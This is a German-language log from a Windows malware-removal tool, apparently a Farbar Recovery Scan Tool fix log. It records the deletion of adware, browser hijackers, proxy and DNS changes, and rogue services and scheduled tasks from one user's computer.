HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => Schl黶sel nicht gefunden. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => Schl黶sel nicht gefunden. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => Schl黶sel nicht gefunden. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt1 => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt10 => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt2 => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt3 => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt4 => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt5 => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt6 => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt7 => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt8 => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt9 => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\00avast => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{472083B0-C522-11CF-8763-00608CC02F24} => Schl黶sel nicht gefunden. 
HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\KzShlobj => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{AAA0C5B8-933F-4200-93AD-B143D7FFF9F2} => Schl黶sel nicht gefunden. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Pending) => Schl黶sel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{056D528D-CE28-4194-9BA3-BA2E9197FF8C} => Schl黶sel nicht gefunden. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Synced) => Schl黶sel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{05B38830-F4E9-4329-978B-1DD28605D202} => Schl黶sel nicht gefunden. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ MEGA (Syncing) => Schl黶sel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{0596C850-7BDD-4C9D-AFDF-873BE6890637} => Schl黶sel nicht gefunden. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt1 => Schl黶sel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{FB314ED9-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt10 => Schl黶sel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{FB314EE2-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt2 => Schl黶sel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{FB314EDA-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt3 => Schl黶sel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{FB314EDD-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt4 => Schl黶sel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{FB314EDE-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt5 => Schl黶sel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{FB314EDB-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt6 => Schl黶sel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{FB314EDF-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt7 => Schl黶sel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{FB314EDC-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt8 => Schl黶sel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{FB314EE0-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
HKLM\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\ShellIconOverlayIdentifiers\ DropboxExt9 => Schl黶sel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{FB314EE1-A251-47B7-93E1-CDD82E34AF8B} => Schl黶sel nicht gefunden. 
C:\Users\Nick Schuster\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\smss.exe => erfolgreich verschoben
HKLM\System\CurrentControlSet\Control\Session Manager\\BootExecute => Wert erfolgreich wiederhergestellt
C:\Windows\system32\GroupPolicy\Machine => erfolgreich verschoben
C:\Windows\system32\GroupPolicy\GPT.ini => erfolgreich verschoben
HKLM\SOFTWARE\Policies\Google => Schl黶sel erfolgreich entfernt
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable => Wert erfolgreich entfernt
HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => Wert erfolgreich entfernt
HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable => Wert erfolgreich entfernt
HKU\S-1-5-19\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => Wert erfolgreich entfernt
HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyEnable => Wert erfolgreich entfernt
HKU\S-1-5-20\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => Wert erfolgreich entfernt
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Windows\CurrentVersion\Internet Settings\\ProxyServer => Wert erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\\NameServer => Wert erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{04A2521B-7C11-484A-B28D-E9BE3102A821}\\DhcpNameServer => Wert erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{9BAF9E4B-D963-4721-8C85-586F3F37FF3C}\\NameServer => Wert erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C085ED3F-9016-49ED-8EF6-3F93AD892C71}\\NameServer => Wert erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{C085ED3F-9016-49ED-8EF6-3F93AD892C71}\\DhcpNameServer => Wert erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{E0DF352E-2385-4F61-8BE1-15E2F9F0520E}\\NameServer => Wert erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{E0DF352E-2385-4F61-8BE1-15E2F9F0520E}\\DhcpNameServer => Wert erfolgreich entfernt
HKLM\SYSTEM\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies\\ => Wert erfolgreich entfernt
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer => Schl黶sel erfolgreich entfernt
HKU\.DEFAULT\SOFTWARE\Policies\Microsoft\Internet Explorer => Schl黶sel erfolgreich entfernt
HKLM\Software\\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
HKLM\Software\\Microsoft\Internet Explorer\Main\\Search Page => Wert erfolgreich wiederhergestellt
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Search Page => Wert erfolgreich wiederhergestellt
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wert erfolgreich wiederhergestellt
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wert erfolgreich wiederhergestellt
HKLM\Software\\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wert erfolgreich wiederhergestellt
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main\\Default_Search_URL => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Internet Explorer\Main\\Search Page => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Internet Explorer\Main\\Start Page => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\Software\Microsoft\Internet Explorer\Main\\Default_Page_URL => Wert erfolgreich wiederhergestellt
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wert erfolgreich wiederhergestellt
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => Schl黶sel nicht gefunden. 
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => Schl黶sel nicht gefunden. 
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => Wert erfolgreich wiederhergestellt
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => Schl黶sel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} => Schl黶sel nicht gefunden. 
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => Schl黶sel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => Schl黶sel nicht gefunden. 
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => Schl黶sel erfolgreich entfernt
HKCR\Wow6432Node\CLSID\{33BB0A4E-99AF-4226-BDF6-49120163DE86} => Schl黶sel nicht gefunden. 
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => Schl黶sel erfolgreich entfernt
HKCR\CLSID\{2211d4a5-48d0-47f5-a7cd-81e861470f7f} => Schl黶sel nicht gefunden. 
C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\naweriweentcofise => erfolgreich verschoben
Firefox "newtab" erfolgreich entfernt
Firefox DefaultSearchEngine erfolgreich entfernt
Firefox SelectedSearchEngine erfolgreich entfernt
Firefox "homepage" erfolgreich entfernt
Firefox "Keyword.URL" erfolgreich entfernt
C:\Users\Nick Schuster\AppData\Roaming\Mozilla\Firefox\Profiles\ajsmomju.default\searchplugins\ourluckysites.xml => erfolgreich verschoben
Firefox "newtab" erfolgreich entfernt
Firefox SelectedSearchEngine erfolgreich entfernt
C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\Extensions\@DA3566E2-F709-11E5-8E87-A604BC8E7F8B.xpi => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\Extensions\@E97YHOMI-FU8L-IM23-VUT9-RVDZT7M8XL8H.xpi => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\Extensions\@H99KV4DO-UCCF-9PFO-9ZLK-8RRP4FVOKD9O.xpi => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\searchplugins\6ddy6fjk.xml => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\searchplugins\startpageing123.xml => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Firefox\Firefox\Profiles\5f8d7llm.default\searchplugins\startsearch.xml => erfolgreich verschoben
HKLM\SOFTWARE\Clients\StartMenuInternet\FIREFOX.EXE\shell\open\command\\Default => Wert erfolgreich wiederhergestellt
HKLM\SOFTWARE\Google\Chrome\Extensions\nahhmpbckpgdidfnmfkfgiflpjijilce => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Google\Chrome\Extensions\pilplloabdedfmialnfchjomjmpjcoej => Schl黶sel erfolgreich entfernt
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Google\Chrome\Extensions\nahhmpbckpgdidfnmfkfgiflpjijilce => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\bpegkgagfojjbcpkihigfmkojdmmimdf => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\ehgldbbpchgpcfagfpfjgoomddhccfgh => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Wow6432Node\Google\Chrome\Extensions\nahhmpbckpgdidfnmfkfgiflpjijilce => Schl黶sel erfolgreich entfernt
HKLM\SOFTWARE\Clients\StartMenuInternet\Google Chrome\shell\open\command\\Default => Wert erfolgreich wiederhergestellt
HKU\S-1-5-21-3847841184-804715454-2304624315-1001\SOFTWARE\Clients\StartMenuInternet\ChromeHTML => Schl黶sel erfolgreich entfernt
"C:\Program Files (x86)\Everness" => nicht gefunden.
HKLM\System\CurrentControlSet\Services\AppleAppSvc => Schl黶sel erfolgreich entfernt
AppleAppSvc => Dienst erfolgreich entfernt
C:\ProgramData\Apple\Temp\upgrade.ini => erfolgreich verschoben
HKLM\System\CurrentControlSet\Services\AppleCloudSvc => Schl黶sel erfolgreich entfernt
AppleCloudSvc => Dienst erfolgreich entfernt
C:\ProgramData\Apple\Common\Cloud\WinHelper.dll => erfolgreich verschoben
BIT => Dienst konnte nicht gestoppt werden.
HKLM\System\CurrentControlSet\Services\BIT => Schl黶sel erfolgreich entfernt
BIT => Dienst erfolgreich entfernt
C:\ProgramData\BIT => erfolgreich verschoben
HKLM\System\CurrentControlSet\Services\FirefoxU => Schl黶sel erfolgreich entfernt
FirefoxU => Dienst erfolgreich entfernt
C:\Program Files (x86)\Firefox => erfolgreich verschoben
HKLM\System\CurrentControlSet\Services\MCSvc => Schl黶sel erfolgreich entfernt
MCSvc => Dienst erfolgreich entfernt
MCSvc => Dienst nicht gefunden.
HKLM\System\CurrentControlSet\Services\MVCSrv => Schl黶sel erfolgreich entfernt
MVCSrv => Dienst erfolgreich entfernt
C:\ProgramData\Package Cache\{2A002F88-FD5D-379B-A350-A25D84AF128B}v14.0.25420\packages\VisualC_D14\VC_IDE.Base\VC_IDE_Base.dll => erfolgreich verschoben
HKLM\System\CurrentControlSet\Services\pgt_svc => Schl黶sel erfolgreich entfernt
pgt_svc => Dienst erfolgreich entfernt
C:\Program Files (x86)\ProxyGate => erfolgreich verschoben
HKLM\System\CurrentControlSet\Services\SpyHunter 4 Service => Schl黶sel erfolgreich entfernt
SpyHunter 4 Service => Dienst erfolgreich entfernt
C:\Program Files\Enigma Software Group => erfolgreich verschoben
HKLM\System\CurrentControlSet\Services\srcsrv => Schl黶sel erfolgreich entfernt
srcsrv => Dienst erfolgreich entfernt
C:\Windows\src_srv\winsrcsrv.exe => erfolgreich verschoben

========================= Folder: C:\Windows\src_srv ========================

2017-05-29 21:59 - 2017-05-29 16:28 - 0013312 _____ () C:\Windows\src_srv\accept_cert.exe
2017-05-29 22:01 - 2017-06-01 11:55 - 5097023 _____ () C:\Windows\src_srv\installsig.exe
2017-05-29 21:59 - 2016-01-25 20:55 - 0455680 _____ () C:\Windows\src_srv\Ionic.Zip.dll
2017-05-29 22:00 - 2017-05-29 22:00 - 0002758 _____ () C:\Windows\src_srv\rootCert.pfx
2017-05-29 21:59 - 2017-05-29 16:27 - 0137728 _____ () C:\Windows\src_srv\Trusted.Web.Proxy.dll

====== Ende von Folder: ======

HKLM\System\CurrentControlSet\Services\SysLinkMapper => Schl黶sel erfolgreich entfernt
SysLinkMapper => Dienst erfolgreich entfernt
C:\ProgramData\F5C6DBD2-9E35-457F-B662-CF7D478FD412 => erfolgreich verschoben
WinSAPSvc => Dienst konnte nicht gestoppt werden.
HKLM\System\CurrentControlSet\Services\WinSAPSvc => Schl黶sel erfolgreich entfernt
WinSAPSvc => Dienst erfolgreich entfernt
C:\Users\Nick Schuster\AppData\Roaming\WinSAPSvc => erfolgreich verschoben
HKLM\System\CurrentControlSet\Services\ZbezjService => Schl黶sel erfolgreich entfernt
ZbezjService => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\3DM => Schl黶sel erfolgreich entfernt
3DM => Dienst erfolgreich entfernt
C:\Users\Nick Schuster\AppData\Local\3DM => erfolgreich verschoben
HKLM\System\CurrentControlSet\Services\Kitty => Schl黶sel erfolgreich entfernt
Kitty => Dienst erfolgreich entfernt
"C:\Users\Nick Schuster\AppData\Local\Kitty" => nicht gefunden.
HKLM\System\CurrentControlSet\Services\kivojebi => Schl黶sel erfolgreich entfernt
kivojebi => Dienst erfolgreich entfernt
"C:\Program Files (x86)\0D8F6370-1479488272-81E4-3884-0071C2420BD3" => nicht gefunden.
HKLM\System\CurrentControlSet\Services\Recover => Schl黶sel erfolgreich entfernt
Recover => Dienst erfolgreich entfernt
"C:\Program Files\Uninstall Information\FHND4RB6YGFG69477PK1CJU4XT48RPI" => nicht gefunden.
HKLM\System\CurrentControlSet\Services\esgiguard => Schl黶sel erfolgreich entfernt
esgiguard => Dienst erfolgreich entfernt
HKLM\System\CurrentControlSet\Services\EsgScanner => Schl黶sel erfolgreich entfernt
EsgScanner => Dienst erfolgreich entfernt
C:\Windows\System32\DRIVERS\EsgScanner.sys => erfolgreich verschoben
HKLM\System\CurrentControlSet\Services\iSafeKrnlMon => Schl黶sel erfolgreich entfernt
iSafeKrnlMon => Dienst erfolgreich entfernt
"C:\Program Files (x86)\Elex-tech" => nicht gefunden.
C:\ProgramData\f9d60eee-4f25-0 => erfolgreich verschoben
C:\ProgramData\f9d60eee-3735-1 => erfolgreich verschoben

========================= Folder: C:\Users\Nick Schuster\AppData\Roaming\NetCtl ========================

2017-06-03 18:00 - 2017-06-03 18:00 - 3043120 _____ (IT Genius) C:\Users\Nick Schuster\AppData\Roaming\NetCtl\netctl.exe

====== Ende von Folder: ======

C:\ProgramData\f9d60eee-6921-1 => erfolgreich verschoben
C:\ProgramData\f9d60eee-2583-0 => erfolgreich verschoben
C:\ProgramData\{279BD4C5-9030-636E-34A5-319E03364EE3} => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Applemy => erfolgreich verschoben
C:\ProgramData\f9d60eee-7817-0 => erfolgreich verschoben
C:\ProgramData\f9d60eee-3a25-1 => erfolgreich verschoben
C:\ProgramData\f9d60eee-0b25-1 => erfolgreich verschoben
C:\ProgramData\f9d60eee-07f7-0 => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\glory => erfolgreich verschoben
C:\Windows\System32\Tasks\fyKiuMkkXh => erfolgreich verschoben
C:\END => erfolgreich verschoben
C:\ProgramData\f9d60eee-7411-1 => erfolgreich verschoben
C:\ProgramData\f9d60eee-49f5-0 => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\Applemy => erfolgreich verschoben
C:\Users\Public\Documents\Google => erfolgreich verschoben
"C:\Program Files (x86)\Firefox" => nicht gefunden.
C:\Program Files (x86)\Applemy => erfolgreich verschoben
C:\ProgramData\{5dc62cb3-512c-0} => erfolgreich verschoben
C:\ProgramData\{241B54D7-93B0-E37C-7209-B5C3B4A67434} => erfolgreich verschoben
C:\ProgramData\{1fc205d4-012c-1} => erfolgreich verschoben
C:\Windows\System32\Tasks\{0B047F47-0F0A-0408-0B11-087F0C0B110F} => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Obsidium => erfolgreich verschoben
"C:\ProgramData\F5C6DBD2-9E35-457F-B662-CF7D478FD412" => nicht gefunden.
C:\Windows\system32\wiperrm.exe => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\WiperSoft => erfolgreich verschoben
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WiperSoft => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\{12A8CCFE-3C33-4995-BAD8-074E4C5B22FD} => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Minerent => erfolgreich verschoben
C:\Program Files (x86)\Arucerther_ => erfolgreich verschoben
C:\Users\Default\AppData\Local\AdvinstAnalytics => erfolgreich verschoben
"C:\Users\Default User\AppData\Local\AdvinstAnalytics" => nicht gefunden.
"C:\Users\Default\AppData\Roaming\Minerent" => nicht gefunden.
"C:\Users\Default User\AppData\Roaming\Minerent" => nicht gefunden.
C:\Program Files (x86)\Arucerther => erfolgreich verschoben
C:\Windows\System32\Tasks\Coobeck Monitor => erfolgreich verschoben
C:\Users\Default\AppData\Local\Cerzaentfisuge => erfolgreich verschoben
"C:\Users\Default User\AppData\Local\Cerzaentfisuge" => nicht gefunden.
"C:\ProgramData\e9cf343f516c47a4a7255147ad1dcd13" => nicht gefunden.
C:\ProgramData\ddef39d292cf4b8ea43c256f14555ff3 => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\FBTime => erfolgreich verschoben
C:\ProgramData\943973b1-7343-1 => erfolgreich verschoben
C:\ProgramData\943973b1-6925-0 => erfolgreich verschoben
C:\Windows\System32\Tasks\ttwifi => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\AppTrailers => erfolgreich verschoben
"C:\Users\Nick Schuster\AppData\Roaming\gplyra" => nicht gefunden.
C:\Users\Nick Schuster\AppData\Roaming\gjtj1a4xugf => erfolgreich verschoben
C:\Windows\System32\Tasks\Quick Tharks Screen Saver => erfolgreich verschoben
C:\Windows\System32\Tasks\SoftUpgrade => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\devnull => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\AdvinstAnalytics => erfolgreich verschoben
C:\Program Files (x86)\SoftUpgrade => erfolgreich verschoben
C:\Windows\System32\Tasks\RunAtStartup => erfolgreich verschoben
C:\ServiceLog.txt => erfolgreich verschoben
"C:\Users\Nick Schuster\AppData\Roaming\Grerdaentlerveck" => nicht gefunden.
C:\Windows\src_srv => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\yxuuo1zrzz4 => erfolgreich verschoben
"C:\Program Files (x86)\ProxyGate" => nicht gefunden.
C:\Windows\System32\Tasks\Gerfety Renew => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\s0ac4g0fkg0 => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\Draveingplererward => erfolgreich verschoben
C:\ProgramData\VideoMemoryDiagnostic => erfolgreich verschoben
C:\Program Files (x86)\Prfasaretaly => erfolgreich verschoben
C:\Program Files (x86)\pccleanplus => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Roaming\Babylon => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\Babylon => erfolgreich verschoben
C:\ProgramData\Babylon => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\terana => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\CSHMDR => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\CWASRE => erfolgreich verschoben
C:\ProgramData\f9d60eee-68a5-1 => erfolgreich verschoben
C:\ProgramData\f9d60eee-5f71-0 => erfolgreich verschoben
C:\Windows\SysWOW64\1 => erfolgreich verschoben
C:\ProgramData\f9d60eee-4cc1-0 => erfolgreich verschoben
C:\ProgramData\f9d60eee-4593-1 => erfolgreich verschoben
C:\ProgramData\{1aa64fd2-712c-1} => erfolgreich verschoben
C:\ProgramData\{02a407e1-212c-0} => erfolgreich verschoben
C:\ProgramData\f9d60eee-5ad5-1 => erfolgreich verschoben
C:\ProgramData\f9d60eee-3ae5-0 => erfolgreich verschoben
C:\ProgramData\f9d60eee-6671-0 => erfolgreich verschoben
C:\ProgramData\f9d60eee-6115-1 => erfolgreich verschoben
C:\Windows\SysWOW64\3333333 => erfolgreich verschoben
C:\Windows\SysWOW64\1111 => erfolgreich verschoben
C:\Windows\SysWOW64\00 => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\NPASRE => erfolgreich verschoben
C:\ProgramData\f9d60eee-4d03-1 => erfolgreich verschoben
C:\ProgramData\f9d60eee-1147-0 => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\VNASRE => erfolgreich verschoben
C:\ProgramData\{636564e6-512c-0} => erfolgreich verschoben
C:\ProgramData\{55b52545-312c-1} => erfolgreich verschoben
C:\ProgramData\{055b525f-612c-0} => erfolgreich verschoben
C:\ProgramData\f9d60eee-3db3-1 => erfolgreich verschoben
C:\ProgramData\f9d60eee-2227-0 => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\ANSARE => erfolgreich verschoben
C:\Users\Public\Documents\temp => erfolgreich verschoben
C:\Users\Public\Documents\chrome => erfolgreich verschoben
C:\ProgramData\f9d60eee-6423-0 => erfolgreich verschoben
C:\ProgramData\f9d60eee-13c7-1 => erfolgreich verschoben
C:\ProgramData\f9d60eee-6415-1 => erfolgreich verschoben
C:\ProgramData\f9d60eee-3141-0 => erfolgreich verschoben
C:\ProgramData\f9d60eee-3ba3-1 => erfolgreich verschoben
C:\ProgramData\f9d60eee-0291-0 => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\background_fault => erfolgreich verschoben
C:\Users\Nick Schuster\AppData\Local\WANARE => erfolgreich verschoben
"C:\ProgramData\BIT" => nicht gefunden.
C:\ProgramData\f9d60eee-5a03-0 => erfolgreich verschoben
C:\ProgramData\f9d60eee-1c67-1 => erfolgreich verschoben
C:\ProgramData\{93E26451-CD9A-43A5-A2FA-C42392EA4001} => erfolgreich verschoben
C:\ProgramData\{E291433F-553A-F494-7993-5DB4F74EF600} => erfolgreich verschoben
C:\ProgramData\{1F88CA98-A823-7D33-19C2-25D7F85A3115} => erfolgreich verschoben
C:\ProgramData\{30a66e80-412c-0} => erfolgreich verschoben
